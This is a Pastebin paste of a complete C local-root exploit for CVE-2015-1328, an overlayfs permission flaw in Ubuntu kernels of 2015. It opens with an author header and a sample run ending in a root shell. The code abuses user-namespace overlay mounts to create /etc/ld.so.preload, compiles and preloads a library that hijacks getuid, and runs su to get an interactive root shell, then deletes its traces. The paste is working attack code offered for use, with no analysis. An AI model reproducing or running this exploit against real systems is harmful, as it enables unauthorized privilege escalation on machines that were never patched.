BogorCyberSec

Ubuntu 3.13

Aug 20th, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 5.00 KB | None | 0 0
  1. /*
  2. # Exploit Title: ofs.c - overlayfs local root in ubuntu
  3. # Date: 2015-06-15
  4. # Exploit Author: rebel
  5. # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
  6. # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
  7. # CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
  8.  
  9. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
  10. CVE-2015-1328 / ofs.c
  11. overlayfs incorrect permission handling + FS_USERNS_MOUNT
  12.  
  13. user@ubuntu-server-1504:~$ uname -a
  14. Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  15. user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
  16. user@ubuntu-server-1504:~$ id
  17. uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
  18. user@ubuntu-server-1504:~$ ./ofs
  19. spawning threads
  20. mount #1
  21. mount #2
  22. child threads done
  23. /etc/ld.so.preload created
  24. creating shared library
  25. # id
  26. uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
  27.  
  28. greets to beist & kaliman
  29. 2015-05-24
  30. %rebel%
  31. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
  32. */
  33.  
  34. #include <stdio.h>
  35. #include <stdlib.h>
  36. #include <unistd.h>
  37. #include <sched.h>
  38. #include <sys/stat.h>
  39. #include <sys/types.h>
  40. #include <sys/mount.h>
  41. #include <stdio.h>
  42. #include <stdlib.h>
  43. #include <unistd.h>
  44. #include <sched.h>
  45. #include <sys/stat.h>
  46. #include <sys/types.h>
  47. #include <sys/mount.h>
  48. #include <sys/types.h>
  49. #include <signal.h>
  50. #include <fcntl.h>
  51. #include <string.h>
  52. #include <linux/sched.h>
  53.  
  54. #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
  55.  
  56. static char child_stack[1024*1024];
  57.  
  58. static int
  59. child_exec(void *stuff)
  60. {
  61.     char *file;
  62.     system("rm -rf /tmp/ns_sploit");
  63.     mkdir("/tmp/ns_sploit", 0777);
  64.     mkdir("/tmp/ns_sploit/work", 0777);
  65.     mkdir("/tmp/ns_sploit/upper",0777);
  66.     mkdir("/tmp/ns_sploit/o",0777);
  67.  
  68.     fprintf(stderr,"mount #1\n");
  69.     if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
  70. // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
  71.         if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
  72.             fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
  73.             exit(-1);
  74.         }
  75.         file = ".access";
  76.         chmod("/tmp/ns_sploit/work/work",0777);
  77.     } else file = "ns_last_pid";
  78.  
  79.     chdir("/tmp/ns_sploit/o");
  80.     rename(file,"ld.so.preload");
  81.  
  82.     chdir("/");
  83.     umount("/tmp/ns_sploit/o");
  84.     fprintf(stderr,"mount #2\n");
  85.     if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
  86.         if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
  87.             exit(-1);
  88.         }
  89.         chmod("/tmp/ns_sploit/work/work",0777);
  90.     }
  91.  
  92.     chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
  93.     umount("/tmp/ns_sploit/o");
  94. }
  95.  
  96. int
  97. main(int argc, char **argv)
  98. {
  99.     int status, fd, lib;
  100.     pid_t wrapper, init;
  101.     int clone_flags = CLONE_NEWNS | SIGCHLD;
  102.  
  103.     fprintf(stderr,"spawning threads\n");
  104.  
  105.     if((wrapper = fork()) == 0) {
  106.         if(unshare(CLONE_NEWUSER) != 0)
  107.             fprintf(stderr, "failed to create new user namespace\n");
  108.  
  109.         if((init = fork()) == 0) {
  110.             pid_t pid =
  111.                 clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
  112.             if(pid < 0) {
  113.                 fprintf(stderr, "failed to create new mount namespace\n");
  114.                 exit(-1);
  115.             }
  116.  
  117.             waitpid(pid, &status, 0);
  118.  
  119.         }
  120.  
  121.         waitpid(init, &status, 0);
  122.         return 0;
  123.     }
  124.  
  125.     usleep(300000);
  126.  
  127.     wait(NULL);
  128.  
  129.     fprintf(stderr,"child threads done\n");
  130.  
  131.     fd = open("/etc/ld.so.preload",O_WRONLY);
  132.  
  133.     if(fd == -1) {
  134.         fprintf(stderr,"exploit failed\n");
  135.         exit(-1);
  136.     }
  137.  
  138.     fprintf(stderr,"/etc/ld.so.preload created\n");
  139.     fprintf(stderr,"creating shared library\n");
  140.     lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
  141.     write(lib,LIB,strlen(LIB));
  142.     close(lib);
  143.     lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
  144.     if(lib != 0) {
  145.         fprintf(stderr,"couldn't create dynamic library\n");
  146.         exit(-1);
  147.     }
  148.     write(fd,"/tmp/ofs-lib.so\n",16);
  149.     close(fd);
  150.     system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
  151.     execl("/bin/su","su",NULL);
  152. }
Add Comment
Please, Sign In to add comment